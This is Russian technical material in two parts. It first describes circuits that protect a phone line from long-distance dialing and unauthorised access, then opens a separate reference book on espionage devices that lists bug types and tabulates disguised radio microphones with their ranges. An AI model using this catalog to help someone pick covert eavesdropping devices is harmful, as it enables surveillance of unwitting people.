В исходном состоянии: счетчик обнулен высоким уровнем с выхода 4 DD1.2, ключ DA1 разомкнут, линия свободна.

4-51.jpg

При снятии трубки телефонного аппарата, подключенного параллельно устройству, на выходе 3 DD1.1 появляется логическая "единица". Через 1,5-2 секунды счетчик DD2 готов к счету импульсов. При наборе цифры "8" и небольшой паузе после нее (ожидание длинного гудка готовности АМТС) на выходе 9 DD2 (после восьмого импульса счета) появляется "единица", что приводит к включению ключа DA1 через DD1.3 - DD1.4. Линия шунтируется сопротивлением R5 и дальнейший набор номера становится невозможным.

При наборе любого другого номера не начинающегося с цифры "8" и при отсутствии пауз ожидания между цифрами линия остается свободной. Кратковременное появление логической единицы на выходе 9 DD2 не приводит к срабатыванию DA1 ввиду наличия буферной цепочки R8, С4.

Обнуление линии (и счетчика) происходит после того, как трубка телефонного аппарата была положена. Для устойчивого саморазблокирования необходимо подобрать шунтирующее сопротивление R5 (ориентировочно 2,5-3 кОм).

При поступлении вызова с АТС цепочка фильтрации R4, С2 не позволяет счетчику DD2 перейти в режим счета и зашунтировать линию.

Рис. 22 Принципиальная схема устройства блокировки межгорода (цифры "8")

Изображение: 

4.6. Схема запуска ограничителя междугородной связи.

4.6. Схема запуска ограничителя междугородной связи

На основе приведенной выше схемы блокиратора цифры "8" можно сделать устройство индикации (ограничения) длительности междугородной связи. На Рис.23 приведена схема запуска ограничителя междугородной связи.

4-61.jpg

В состав схемы входят:

• таймер;

• ключ—DA1;

• резистивно-емкостная цепь — R6, С2;

• звуковой генератор — DD2, R4, R5, СЗ, ЗП-3;

• цепь питания VD 1, R2, С 1, VD2;

• счетчик цифр — DD1.

Датчик контроля напряжения и цепи подготовки к счету DD1 аналогичны описанным в схеме блокиратора цифры "8".

При наборе цифры "8" и выходе на междугородную связь происходит запуск таймера с заранее выставленным временем срабатывания. Включение ключа DA1 и звукового генератора DD2 говорит об окончании установленного времени.

Шунтирование линии цепью R6, С2 приводит к подавлению разговора более чем на 20 дБ. В принципе, ключ DA1 может отсутствовать, тогда вся схема носит сигнализирующий характер для самоконтроля абонента.

Рис. 23 Принципиальная схема ограничителя времени междугородных разговоров

Изображение: 

4.7. Блокиратор междугородного кода с ограничением количества цифр номера.

4.7. Блокиратор междугородного кода с ограничением количества цифр номера

Еще один способ запрета междугородной связи заключается в ограничении количества набираемых цифр номера. Практика показывает, что в большинстве случаев максимальное количество цифр номера внутригородской связи не превышает восьми (5-7 значный номер плюс одна цифра ведомственной АТС, чаще всего "9"). Тогда, выход на междугородную связь подразумевает следующую

последовательность набора: "8" + код города (минимум три цифры) + номер вызываемого абонента (минимум пять цифр), что в сумме составляет девять цифр и более. Таким образом, если ограничить номер восемью цифрами, можно застраховать себя от дорогостоящих междугородных и тем более международных разговоров.

На Рис. 24 приведена принципиальная схема блокиратора с ограничением количества цифр номера.

В состав схемы входят:

• датчик тока—R1,VT1;

• фильтр вызова АТС—R4,C2,DD1.2;

• счетчик — DD2;

• ограничитель времени запрета — R7, С4, DD1.3;

• цепь формирования импульсов счета — VD3, R5,C3;

• ключ—DA1;

• нагрузочное сопротивление — R8;

• цепь питания — VD1, R3, С1, VD2.

Принцип работы схемы заключается в следующем.

В исходном состоянии: счетчик DD2 обнулен, на выходе 3 DD1.1 - "ноль", на выходе 4 DD1.2 - "единица", ключ DA1 закрыт, линия свободна.

При снятии трубки на телефонном аппарате через время, задаваемое R4, С2, счетчик DD2 подготавливается к счету (появляется "ноль" на выходе 4 DD1.2).

При наборе номера на аппарате датчик тока R1 через VT1 синхронно с импульсами набора номера переключает элемент DD 1.1. Сформированные таким образом импульсы поступают на вход 14 DD2. Цепочка R5, СЗ расчитана таким образом, чтобы время заряда СЗ было много больше, чем время разряда СЗ через VD3, поэтому счетчик DD2 осуществляет счет не конкретных импульсов, а группы импульсов, то есть количества цифр набираемого номера.

Изначально, ключ DA1 заперт через VD6 на выход 9 DD2, находящийся в состоянии логического нуля.

После того, как счет цифр номера приводит к появлению высокого уровня на выходе 9 DD2, ключ DA1 открывается плюсом питания через резистор R9. Линия шунтируется сопротивлением нагрузки R8. Одновременно, счет цифр останавливается подачей единицы на вход 13 DD2 через VD4. Кроме этого, начинается постепенный заряд емкости С4 через R7 (10-12 секунд). В течение этого времени набор номера невозможен. По истечении времени, необходимого для зарядки С4, элемент DD1.3 переключается, и на выходе 10 DD1.3 появляется логический "ноль", который практически мгновенно обнуляет блокиратор (диод VD7 - отключение ключа DA1, диод VD5 - обнуление счетчика). После этого блокиратор опять находится в режиме ожидания.

Защитный эффект достигается тем, что на всех междугородных АТС, ввиду их большой загрузки, сокращено время ожидания каждой цифры номера. Если при наборе междугородного кода возникнет пауза между цифрами более 8-10 секунд, АТС дает отбой в линию. Кроме этого, при самовольном подключении абонент может не прекратить дальнейший набор номера (он не знает, что линия зашунтирована), и, соответственно, девятая и последующие цифры номера набираются впустую, так как АТС их не воспринимает. После того, как трубка была положена на аппарат, через время, определяемое опять же R4, С2, блокиратор вернется в исходное состояние.

4-71.jpg

Для этой схемы характерно, что она допускает большой разброс временных параметров: например, время подготовки счетчика, определяемое R4, С2 (т.н. фильтр вызова АТС) можно смело сократить вдвое. В результате, посылка вызова АТС может быть обработана счетчиком DD2, но будут обрабатываться не импульсы 25 Гц, а группы, т.е. огибающая сигнала вызова. Счетчик каждый раз будет переключаться на одно состояние вниз, а потом (в паузах) обнуляться. Кроме этого, время запрета, определяемое R7, С4, можно смело увеличить в несколько раз, что еще больше затруднит самовольный выход на межгород.

При эксплуатации такого блокиратора те абоненты, которые будут использовать обычные внутригородские номера, должны делать обязательную 2-4 секундную паузу между наборами различных номеров, чтобы исключить возможность включения запрета.

Рис. 24 Принципиальная схема блокиратора междугородного кода с ограничением количества цифр

Изображение: 

4.8. Схема кодированного доступа к линии через одну цифру.

4.8. Схема кодированного доступа к линии через одну цифру

Для ограничения доступа посторонних лиц к телефонному аппарату, а также для защиты радиотелефонов применяют устройства дополнительного кодирования. В простейшем случае набор кода производится вручную на диске (тастатуре) телефонного аппарата. На Рис. 25 приведена схема кодирования доступа к линии, где в качестве кода используется одна цифра. Несмотря на простоту, эффективность применения схемы может быть достаточно велика.

4-81.jpg

В состав схемы входят:

• датчик тока R1,VT1;

• узел подготовки счета - DD1.1, R3, С2, DD1.2;

• счетчик — DD2;

• узел включения запрета набора номера DD1.3.R5;

• ключ DA1;

• нагрузочное сопротивление — R4;

• узел отключения запрета — R7, R8, СЗ, DD1.4, DD3.1.VD2;

• цепь питания микросхем — VD 1, R9, С4, VD4.

Алгоритм работы схемы следующий.

После снятия трубки с аппарата (ТА) счетчик DD2 подготавливается к счету (через время ~ 1,5-2 с на выходе 4 DD1.2 появляется логический "ноль"). Одновременно, через элемент DD1.3 включается ключ DA1, тем самым шунтируя линию нагрузочным сопротивлением R4. Реальный набор номера невозможен. Но, благодаря наличию датчика тока Rl, VT1, возможен прием одной цифры кода. Цифра устанавливается переключателем SA1.

Импульсы кодовой цифры поступают с выхода 3 DD1.1 на счетный вход 14 DD2. Если код принят правильно, элемент DD1.4 переключается, закорачивая через диод VD2 управляющий вход DA1. Линия свободна для дальнейшего набора номера.

Элемент DD3.1 фиксирует состояние счетчика DD2 при правильном наборе кода. Если код принят неправильно, микросхема DD2 считает по кругу до тех пор, пока случайно не попадает на необходимый выход счетчика. Таким образом, при незнании кода невозможно набрать полный номер абонента.

Если модернизировать схему установив дополнительный диод VD4, подключив его к выходу 11 (9) DD2, а цифру кода ограничить от 1 до 8, набор номера

становится вообще невозможен, потому что, как только счет DD2 доходит до девятой позиции (выход 11), микросхема DD2 останавливает счет и ключ DA1 остается включенным в течение всего времени попытки набора номера.

Необходимо отметить, что импульсы набора кода никак не влияют на состояние АТС, ее аппаратура их не воспринимает, так как линия шунтируется R4. При приеме вызова с АТС цепочка R3, С2 не позволяет переключить элемент DD1.2 и включить шунтирование линии ( а также счет микросхемой DD2). Переход устройства в первоначальное состояние (режим охраны) происходит через 1,5-2 секунды после того, как трубка ТА была положена на аппарат.

Приведенное выше устройство легко встроить в телефонный аппарат или в стационарный блок радиотелефона.

Рис. 25 Принципиальная схема кодированного доступа к линии через одну цифру

Изображение: 

4.9. Устройство кодирования линии импульсныи двухзначным кодом.

4.9. Устройство кодирования линии импульсным двухзначным кодом

Если прием импульсного кода производится с помощью датчика тока, включенного последовательно с телефонным аппаратом, то такое устройство не позволяет осуществить защиту линии при параллельном подключении пиратского аппарата. В самом деле, когда трубка основного ТА положена на аппарат, импульсы набора номера не воспринимаются последовательным датчиком тока. Для устранения этого недостатка требуется введение в схему датчика напряжения линии.

На Рис. 26 приведена схема устройства кодирования линии импульсным двухзначным кодом, которая подключается параллельно защищаемому ТА.

4-91.jpg

Таблица 2. Список деталей схемы устройства кодированного доступа к линии импульсным двухзначным кодом.

Элемент схемы

Номинал

Элемент схемы

Номинал

DA1

1014КТ1А

R9

DD1.DD2

К561ЛА7

R10

1,5М

DD3

К561ИЕ8

R11

560К

VD1-VD4.VD5-VD6

КД102А

R12

390К

VD7.VD10

Д814А1

R13

10М

VD8,VD9,VD11-VD17

КД522Б

R14

390К

R1

С1

1,ОмКф

R2

4.7М

С2

1000пФ

R3

1,5М

СЗ

220,0 мкФ

R4

ЮМ

С4

1,0 мкФ

R5

С5

10,0 мкФ

R6

ЮМ

С6

1,0 мкФ

R7

390К

С7

1,0 мкФ

R8

5,6М

VT1

КТ315Г


В данной схеме вводится дополнительный элемент кодирования — алгоритм набора кода. Устройство реализует следующий алгоритм набора кода:

• снятие трубки ТА (слышен ответ станции 425 Гц);

• пауза 2-3 секунды (подготовка узла приема кода);

• набор двухзначного кода на диске (тастатуре) телефона без пауз между цифрами кода;

• кратковременный сброс линии

(кратковременно нажать на рычажный переключатель ТА, дождаться появления вновь сигнала ответа станции 425 Гц);

• набор номера абонента и установление связи.

Как видно из алгоритма, импульсы кода формируются непосредственно на линейных проводах линии, то есть они воспринимаются аппаратурой АТС как

набор первых двух цифр обычного номера. Таким образом, при неправильном наборе кода либо невыполнении алгоритма набора устройство осуществляет запрет дальнейшего набора номера (начиная с 3-4 цифры).

Следует отметить, что встречаются АТС, для которых набор конкретной цифры (например, "5") немедленно вызывает отбой линии, но это не мешает формированию и приему импульсов кода (их амплитуда по-прежнему составляет 60 В).

В состав схемы импульсного кодирования входят:

• диодный мост униполярного включения — VD1-VD4;

• датчик напряжения — VD5, R6, VD7, R5, С2, DD1.1;

• узел подготовки счета — VD9, R8, R9, С4, DD1.2;

• счетчик—DD3;

• узел приема первой цифры кода — SA2, VD 13, R13, R14, С7, DD2.3, DD2.4, VD15;

• узел приема второй цифры кода — SA2, R12, C6,DD2.1,DD2.2,VD14;

• схема временного включения запрета — R2, C1,DD1.3,R3;

• схема включения запрета по сумме цифр номера—R11,VT1,VD12, VD17;

• ключ запрета — DA 1;

• нагрузочное сопротивление — R1;

• схема принудительного отключения запрета — VD8,R4,C5,DD1.4,VD11;

• цепь питания микросхем — VD6, R7, СЗ. VD 10.

Принцип действия схемы заключается в следующем.

Подготовка к приему кода и временное включение запрета набора номера

В соответствии с алгоритмом, после снятия трубки на телефонном аппарате происходит подготовка к запуску счетчика DD3 (заряд С4 через VD9, R9, R8). Через 2-3 секунды (пауза по алгоритму) на входе 15 DD3 появляется логический "ноль", и микросхема DD3 готова к приему импульсов кода. До начала счета высокий уровень с выходя 3 DD3 поддерживает емкость С1 в заряженном состоянии через R2, соответственно, ключ DA1 разомкнут (запрет выключен).

После того как набрана первая цифра кода (или обычного номера), на выходе 3 DD3 появляется "ноль" и емкость С1 начинает разряжаться через R2. Время разряда, а значит и переключения элемента DD1.3 составляет около 5 секунд, поэтому обе цифры кода должны быть набраны быстро, без пауз между цифрами. Если код набран неверно или набирался обычный телефонный номер, то через 5 секунд после начала набора первой цифры сработает ключ DA1, зашунтировав линию нагрузочным сопротивлением R1 (включается запрет дальнейшего набора номера).

Прием кода

Прием первой цифры кода осуществляется через переключатель SA2, а второй — через SA1. Схема подключения выводов приведена в таблице 3. Заметим, что вторая цифра отсчитывается от первой по кольцу счетчика DD3. В исходном состоянии диод VD15 закорачивает емкость С6 на "ноль" на выходе 3 DD2.4, поэтому узел приема второй цифры не может сработать раньше первого. При правильном приеме первой цифры на выходе 3 DD2.4 появляется "единица", а значит, цепь R12, С6 готова к приему второй цифры. Одновременно, через диод VD17 запирается база транзистора VT1, который используется в цепи включения запрета по сумме цифр номера. Если

вторая цифра также набрана верно, то на выходе 4 DD2.2 появляется "единица", которая:

• через VD 16 останавливает счет DD3;

• через VD 14 фиксирует состояние узла приема первой цифры (емкость С7);

• через диод VD12 отключает ключ запрета DA1. Таким образом, после правильного выполнения алгоритма включения, а также набора двух цифр кода. ключ запрета DA1 принудительно блокируется. Линия свободна и, если выполнить кратковременный сброс линии. можно набирать любой номер для установления связи.

Таблица 3. Зависимость кода от схемы подключения выводов.

Вывод микросхемы DD3

Код

Переключатель SA2

Переключатель SA1

Первая цифра кода

Вторая цифра кода

1

2

56

1

4

57

1

7

58

1

10

59

5

2

65

5

4

66

5

7

67

5

10

68

6

2

74

6

4

75

6

7

76

6

10

77

9

2

83

9

4

84

9

7

85

9

10

86


Включение запрета по сумме цифр номера

Время включения запрета в 5 секунд выбрано из практических соображений для устойчивого приема кода. Но существующие кнопочные телефонные аппараты позволяют достаточно быстро набрать номер (быстрее 5-7 секунд), поэтому для повышения эффективности применения устройства кодирования в схему встроена цепочка R11, VT1, которая включает запрет набора номера, когда сумма цифр превышает 9 (девять). В этом случае открывается транзистор VT1 (через R11 с выхода 11 DD3) и принудительно переключает элемент DD1.3, включая, тем самым, ключ запрета DA1. Естественно, что цепь R] 1, VT1 не действует, когда правильно набрана первая цифра кода, так как база VT1 закорочена диодом VD17 на выход DD2.3.

Отключение запрета набора номера

После появления высокого уровня на выходе DD1.3 начинается заряд емкости С5 через R4. Время заряда выбрано достаточно большим (около 2-х минут), после его окончания происходит быстрое обнуление счетчика DD3 и вся схема приходит в исходное состояние готовности к приему кода.

В случае, когда код был принят верно, схема приходит в исходное состояние после того, как трубка телефонного аппарата была положена на время более 3-4 секунд (определяется временем разряда С4 через R8).

Если включить параллельно шунтирующему сопротивлению светодиод, то полученная светодиодная индикация состояния ключа запрета DA1 поможет освоить алгоритм набора кода.

В этом случае порядок проверки работоспособности устройства будет следующим:

• подключить устройство к линии двумя проводами без учета полярности, разводку производить непосредственно в телефонной розетке;

• при первом включении прибора возможно кратковременное (на 6-10 секунд) срабатывание системы запрета (светодиод горит);

• после снятия трубки и паузы до 3-х секунд набирается двухзначныи код (светодиод в этом режиме не горит);

• производится кратковременный сброс линии и ожидание сигнала ответа станции 425 Гц;

• если светодиод не загорается, значит код принят верно и можно набирать необходимый номер для установления связи;

• для проверки работоспособности системы запрета набора номера необходимо набрать любой номер без предварительного набора кода; запрет набора номера происходит одновременно с зажиганием светодиода (либо через 5 секунд после начала набора, либо после 2-х - 4-х цифр номера, что однозначно не позволяет набрать полный номер и установить связь).

Устройство защиты линии, работающее по описанному выше алгоритму, рекомендуется для применения совместно с радиотелефоном или обычным аппаратом, когда необходима простая кодовая защита от всех видов подключений. Данное устройство может быть установлено и на выходных клеммах АТС, тогда оно

препятствует нелегальному использованию линии даже при разрыве шлейфа АТС-абонент.

Таблица 2. Список деталей схемы устройства кодированного доступа к линии импульсным двухзначным кодом.

Изображение: 

5.Общие рекомендации по применению технических средств защиты.

Общие рекомендации по применению технических средств защиты.

Решение об использовании различных технических устройств для защиты от самовольного коммерческого использования телефонной линии обычно принимается после того, как все остальные меры защиты (в основном организационного плана) оказались безрезультатными. В частности, проверка и контроль линии не выявили мест подключения, а руководство узлов связи не провело эффективной работы по предупреждению случаев пиратства. В то же время, счета на оплату поступают по-прежнему завышенные и на их списание надежд нет. В этом случае абоненты АТС обращают внимание на индивидуальные средства контроля и защиты линии. Но прежде чем установить их на своей линии необходимо еще раз попытаться использовать все технические возможности официальных служб узлов связи. В частности, электронные АТС последних моделей допускают кодирование исходящей связи 2-х - 4-х значным кодом. После снятия трубки на аппарате абонент вручную набирает код на диске (тастатуре) ТА, после чего связь происходит обычным образом. Код устанавливается по письменной заявке абонента. К сожалению, невозможность достаточно оперативного изменения кода снижает эффективность

подобной услуги. Индивидуальный код может быть считан при помощи простейших электронных устройств.

С учетом вероятностного характера пиратских подключений (глава 1) в качестве простейшей технической защиты телефона могут быть рекомендованы следующие решения.

Для домашнего ТА

Установка двух блоков защиты:

• от параллельного подключения (последовательное включение с ТА)

• блокиратор межгорода по любому принципу

действия ("8", "07", ограничение цифр). Схема включения приведена на Рис. 32. Следует отметить, что почти для всех описанных выше схем защиты допускается их комплексное последовательно-параллельное включение. Необходимо лишь контролировать суммарное сопротивление нагрузки на линию по цепям питания приборов, которое не должно быть менее 300 кОм.

5-11.jpg

Для телефонов на предприятиях

Учитывая, что главной проблемой для внутренних линий является проведение междугородных переговоров за

счет предприятия, фирмы, можно рекомендовать установку блокираторов межгорода на все линии, которые необходимо отключить от АМТС (выхода на межгород через цифру "8" или по заказу "07"). Естественно, что эту проблему решают и службы АТС, но процедура занимает много времени, а в случае индивидуальных блоков защиты появляется возможность оперативной перепланировки кросса силами предприятия. Схема установки приведена на Рис. 33.

5-12.jpg

Для радиотелефонов

Кроме всех видов пиратских подключений на участке проводной связи, для радиотелефонов характерно подключение в зоне радиоканала. Проблема обострилась в последнее время, когда в продаже появились дешевые сканеры, позволяющие имитировать любой переносной блок. Количество жалоб постоянно возрастает. Службы АТС практически не готовы решать проблему противодействия пиратству на радиочастоте. Единственным, на сегодняшний день, реальным способом борьбы (без изменения принципиальной схемы радиотелефона) является установка блокиратора межгорода и блока дополнительного кодирования линии. При достаточно частой смене кода вероятность того, что пираты будут анализировать дополнительный код, набираемый вручную, мала. Очевидно, что им легче перестроиться на незащищенную линию. На Рис. 34 приведена схема защиты радиотелефона. Кстати, установка абсолютного блокиратора межгорода (т.е. блокиратора, который можно отключить лишь находясь в помещении, где он установлен) позволяет на 100% гарантировать отсутствие дорогостоящих междугородных разговоров по радиочастоте радиотелефона.

5-13.jpg

защита домашнего телефона

Изображение: 

защита радиотелефона

Изображение: 

защита телефона на предприятиях

Изображение: 

6. ЛИТЕРАТУРА.

ЛИТЕРАТУРА

1. И.Н.Бронштейн, К.А.Семендяев. Справочник по математике. Издание 13-е исправленное. — М.; Наука, 1998г.—544с.

2. И.Н.Балахничев, А.В.Дрик. Практическая телефония. — Мн.: Наш город, 1998г. — 128с.

3. К.Мовсун-Заде. "Сторож" вашего телефона. — М.:

"РАДИО" №11 1998г., с.53.

4. Б.З.Берлик, А.С.Брискер и др. Справочник. Городская телефонная связь. — М.: Радио и связь, 1987г. — 280с.

5. Каталог-справочник. Оружие шпионажа. — М.:

Империал, 1994г. — 240с.

4. Устройства и системы технической разведки и защиты

Раздел 4.

Андpианов В.И. Боpодин В.А. Соколов А.В.Спpавочное пособие.-Лань,СПБ.,1996

1. Введение

Рецензия

До недавнего времени область техники, которой посвящена эта книга, была под строгим государственным контролем, и информация о достижениях науки в этой области была доступна только узкому кругу специалистов. Вместе с развитием рыночных отношений и снятием "железного занавеса" возникла возможность вынесения темы "секретных" устройств и технологий на широкое обсуждение. Условия успешного развития бизнеса сегодня неразрывно связаны с использованием информационных ресурсов, поэтому и круг читателей, интересующихся этой темой, постоянно растет. Среди книг, опубликованных на настоящий момент в России и странах Содружества, данная книга выделяется доступностью изложения материала без ущерба для его качества, широтой охвата темы, хорошим стилем изложения, достаточным количеством иллюстративного материала. На наш взгляд, эта книга будет очень полезна прежде всего сотрудникам служб безопасности государственных и частных предприятий, уделяющих большое значение вопросу защиты коммерческой информации, а также подготовленным радиолюбителям, желающим применить свои знания в этой области.

Генеральный директор Ассоциации Защиты Информации "Конфидент" Кузнецов П.А.

2. Глава 1. Устройства и системы технической разведки

Глава 1. Устройства и системы технической разведки

1.1. Общие сведения

1.1. Общие сведения

Бурное развитие техники, технологии, информатики в последние десятилетия вызвало еще более бурное развитие технических устройств и систем разведки. В самом деле, слишком часто оказывалось выгоднее потратить N-ю сумму на добывание, например, существующей уже технологии, чем в несколько раз большую на создание собственной. А в политике или в военном деле выигрыш иногда оказывается просто бесценным.

В создание устройств и систем ведения разведки вкладывались и вкладываются огромные средства во всех развитых странах. Сотни фирм многих стран активно работают в этой области. Серийно производятся десятки тысяч моделей "шпионской" техники. Эта отрасль бизнеса давно и устойчиво заняла свое место в общей системе экономики Запада и имеет прочную законодательную базу.

В западной печати можно найти весьма захватывающие документы о существовании и работе международной организации промышленного шпионажа "Спейс Инкорпорейтед" а заодно и познакомиться со спектром услуг, предлагаемых этой компанией. Так, английская газета "Пипл" сообщает, что среди клиентов компании есть не только промышленники, но и организованные преступные группировки. Как и любой бизнес, когда он выгоден, торговля секретами расширяет область деятельности, находя для своего процветания выгодную почву. Так, в Израиле, по примеру США, начинают относится к ведению разведки в экономической области как к выгодному бизнесу.

В качестве подтверждения можно привести факт создания бывшим пресс-секретарем израильской армии Эфраимом Лапидом специализированной фирмы "Ифат" по сбору и анализу сведений,которые могли бы заинтересовать различных заказчиков (не исключая и министерство обороны). По мнению Э. Лапида, Израиль, отличающийся большим спектром международных связей, выбором иностранной печати и удачным геополитическим положением, является "удобным" государством для организации и ведения "бизнес-разведки".

Французский журнал деловых кругов "Антреприз" так характеризует национальные черты промышленного шпионажа: "... наиболее агрессивными являются японцы. Шпионаж на Востоке носит систематический и централизованный характер. Что касается американцев, то они уделяют значительную часть своего времени взаимному шпионажу...''

Тематики разработок на рынке промышленного шпионажа охватывают практически все стороны жизни общества, безусловно ориентируясь на наиболее финансово выгодные.

В России после 1917 года ведение коммерческой разведки находилось под строгим контролем государства. В Советском Союзе в этой области были сосредоточены великолепные, если не сказать лучшие, специалисты. Выдающимся достижением было и останется на многие годы чудо технической разведки - здание посольства США в Москве, превращенное в огромное "ухо", в котором каждый вздох, каждый шорох был доступен для записи и анализа. Датчики находили даже в сварных стальных конструкциях здания, причем по плотности материала они соответствовали окружающему металлу и были недоступны для рентгеновского анализа. Эти системы были способны функционировать автономно десятки лет. Американцы вынуждены были отказаться от использования этого здания, даже несмотря на то что бывший глава КГБ Вадим Бакатин передал им схему построения этой системы.

Крушение СССР и развитие свободной рыночной экономики возродило спрос на технику подобного рода. Сказавшиеся без работы специалисты военно-промышленного комплекса не замедлили предложить своп услуги и в этой области. Спектр услуг широк: от примитивных радиопередатчиков до современных аппаратно-программных комплексов ведения разведки. Конечно, у нас нет еще крупных фирм, производящих технику подобного рода, нет и такого обилия моделей, как на Западе, но техника наших производителей вполне сопоставима по своим данным с аналогичной западной, а иногда лучше и дешевле. Разумеется, речь идет о сравнении техники, которая имеется в открытой продаже.

Естественно, аппаратура, используемая спецслужбами (ее лучшие образцы) намного превосходит по своим возможностям технику, используемую коммерческими организациями. В качестве примера можно привести самый маленький и самый дорогой в мире радиомикрофон, габариты которого не превышают четверти карандашной стерательной резинки. Этот миниатюрный передатчик питается от изотопного элемента и способен в течение года воспринимать и передавать на приемное устройство, расположенное в полутора километрах, разговор, который ведется в помещении шепотом. Кроме того, уже сейчас производятся "клопы", которые могут записывать перехваченную информацию, хранить ее в течение суток или недели, передать в режиме быстродействия за миллисекунду, стереть запись и начать процесс снова.

В уже упоминавшемся новом здании американского посольства элементы радиозакладок были рассредоточены по бетонным блокам, представляя собой кремниевые вкрапления. Арматура использовалась в качестве проводников, а пустоты - в качестве резонаторов и антенн. Анализируя опыт развития подобной техники, можно сделать вывод, что возможность ее использования коммерческими организациями является только делом времени. Выделим основные группы технических средств ведения разведки.

  • Радиопередатчики с микрофоном (радиомикрофоны):
    • с автономным питанием;
    • с питанием от телефонной линии;
    • с питанием от электросети;
    • управляемые дистанционно;
    • использующие функцию включения по голосу;
    • полуактивные;
    • с накоплением информации и передачей в режиме быстродействия .
  • Электронные "уши":
    • микрофоны с проводами;
    • электронные стетоскопы (прослушивающие через стены);
    • микрофоны с острой диаграммой направленности;
    • лазерные микрофоны;
    • микрофоны с передачей через сеть 220 В;
    • прослушивание через микрофон телефонной трубки;
    • гидроакустические микрофоны.
  • Устройства перехвата телефонных сообщений:
    • непосредственного подключения к телефонной линии;
    • подключения с использованием индукционных датчиков (датчики Холла и др.);
    • с использованием датчиков, расположенных внутри телефонного аппарата;
    • телефонный радиотранслятор;
    • перехвата сообщений сотовой телефонной связи;
    • перехвата пейджерных сообщений;
    • перехвата факс-сообщений;
    • специальные многоканальные устройства перехвата телефонных сообщений.
  • Устройства приема, записи, управления:
    • приемник для радиомикрофонов;
    • устройства записи;
    • ретрансляторы;
    • устройства записи и передачи в ускоренном режиме;
    • устройства дистанционного управления.
  • Видеосистемы записи и наблюдения.
  • Системы определения местоположения контролируемого объекта.
  • Системы контроля компьютеров и компьютерных сетей.

В этой главе мы коснемся только тех технических средств ведения разведки, которые представлены в настоящее время на рынке России.

1.2. Радиомикрофоны

1.2. Радиомикрофоны

Радиомикрофон, как следует из названия, это микрофон, объединенный с радио, т.е. с радиоканалом передачи звуковой информации. В настоящий момент нет устоявшегося названия этих устройств. Их называют радиозакладками, радиобагами, радиокапсулами, иногда - "жуками", но все-таки самым точным названием следует признать название, вынесенное в заголовок данного раздела. Мы будем придерживаться в дальнейшем этого названия, хотя оно и не самое "сочное" из перечисленных.

В общем виде структурная схема радиомикрофона приведена на рис. 1.1. Радиомикрофоны являются самыми распространенными техническими средствами ведения коммерческой разведки. Их популярность объясняется прежде всего удобством их оперативного использования, простотой применения (не требуется длительного обучения персонала), дешевизной, очень небольшими размерами. В самом простом случае радиомикрофон состоит из собственно микрофона, т.е. устройства для преобразования звуковых колебаний в электрические, а также радиопередатчика - устройства, излучающего в пространство электромагнитные колебания радиодиапазона (несущую частоту), промодулированные электрическими сигналами с микрофона. Микрофон определяет зону акустической чувствительности (обычно она колеблется от нескольких до 20 - 30 метров), радиопередатчик - дальность действия радиолинии. Определяющими параметрами с точки зрения дальности действия для передатчика являются мощность, стабильность несущей частоты, диапазон частот, вид модуляции.

Существенное влияние на длину радиоканала оказывает, конечно, и тип радиоприемного устройства. На приемных устройствах мы остановимся, хотя и коротко, позже.

Устройство управления не является обязательным элементом радиомикрофона. Оно предназначено для расширения его возможностей: дистанционного включения-выключения передатчика, микрофона, записывающего устройства, переключения режимов. Могут быть предусмотрены режимы: включения по голосу, режим записи в реальном времени, режим ускоренного воспроизведения и т.д.

Устройство записи, как следует из сказанного выше, также не является обязательным элементом.

Разработаны и выпускаются серийно сотни моделей радиомикрофонов, в том числе не менее ста типов - в России и СНГ (в основном на Украине и в Белоруссии).

Технические данные радномнкрофонов находятся в следующих пределах:

вес ........................................... от 5 до 350 г

габариты..................................от 1 см^3 до 8 дм^3

частотный диапазон ...................... от 27 до 900 МГц

мощность ..................................... от 0,2 до 500 мВт

дальность без ретранслятора ......... от 10 до 1500 м

время непрерывной работы ........... от нескольких часов до нескольких лет.

Более подробные данные по конкретным моделям приведены в табл. 1.1. Как видно из данной таблицы, дальность действия, габариты и время непрерывной работы находятся в очень тесной зависимости друг от друга. В самом деле, для увеличения дальности необходимо прежде всего поднять мощность, одновременно возрастает ток, потребляемый от источника питмия, который быстрее расходует свой ресурс, а значит, сокращается время непрерывной работы. Чтобы увеличить это время, увеличивают емкость батарей питания, но это увеличивает габариты радиомикрофона. Можно увеличить длительность работы передатчика введением в его состав устройства дистанционного управления (включение-выключение), однако это также увеличивает габариты. Кроме того, нужно иметь в виду, что увеличение мощности передатчика облегчает возможность его обнаружения.

Наличие такого большого количества моделей радиомикрофонов объясняется тем, что в различных ситуациях требуется определенная модель.

Очень часто подобные изделия предлагаются комплектами. На рис. 1.2 приведен один из таких комплектов - АО-17.

Это профессиональный комплект различных радиомикрофонов с автоматическим приемником и индикатором излучений. Диапазон частот 350450 МГц. Комплект размещается в портфеле.

Таблица 1.1. Технические данные радиомикрофонов промышленного изготовления

Модель

Габариты

Тип и напряжения питания

Вес

Тип корпуса

Дальность действия

Каналы

Вpемя непрерывн pаботы

Дополнительные данные

СAL-201

128x70x18

Щелочн.бат. АМ-З бат. (1,5В)х2

100г

Закамуфлирован под калькулятор

100-200

3(А,В,С)

150

Встроенный высокочувствительный микрофон. Можно одновременно пользоваться калькулятором

DХ-400

84х56х22

Литие.бат. 2СВ-5 (6В)х1 бат.

130г

Пластмасовый прямоугольный корпус

1000-1500 3(А,В,С)

3(А,В,С)

15

Микрофон в виде булавки для галстука передает звук и прерывистый тональный сигнал

ТК-400

166х27х14

Литие.бат. СВ-12600SЕ бат.

52г

Пластмасовый прямоугольный

1500-1000

3(А,В,С)

130

Обеспечивают высокое качество звука

СAL-205

180x135х40

Сеть 220В и аккуму. бат.

350г

Настольный калькулятор

100-200

3(А,В,С)

не ограничен

12-pазрядный калькулятор и микрофон могут работать одновременно

ТК-400М

аналогично ТК-400

аналогично ТК-400

анал. ТК-400

анал.ТК-400

500-1000

3(А,В,С)

130

Микрофон в виде булавки для галстука, внешний микроскопи ческий микрофон, микрофон в виде иглы

N-110N-2

62x18x9

сеть 110B сеть 220В

20г

Пластмассовый

100-200

3(А,В,С)

не огран.

Тайный секpетаpь. Скpытый

передатчик с питанием от сети переменного тока. Наиболее удобно поместить в совмещенную настенную pозетку.

РК-3ОО

Длина 130 мм

батареи SR-48W бат. (1.5В)х2

120г

Авторучка

100-200

3(А,В,С)

15 часов

Одна из наиболее интересных моделей. Ручкой можно пользоваться не вызывая подозрений.

СD-500S

86х545х4.5

Лити.бат. CR-2430(3В) бат.

20г

Кредитная карточка

200-300

3(А,В,С)

30 часов

Плоский, как кредитная карта, передатчик. Легко использовать при любых обстоятельствах.

AZ-110A

70х35х20

От сети 110 или 220 В

45г

Тройник-перен. для быт.аппар.

100-200

3(А,В,С)

Не ограничен

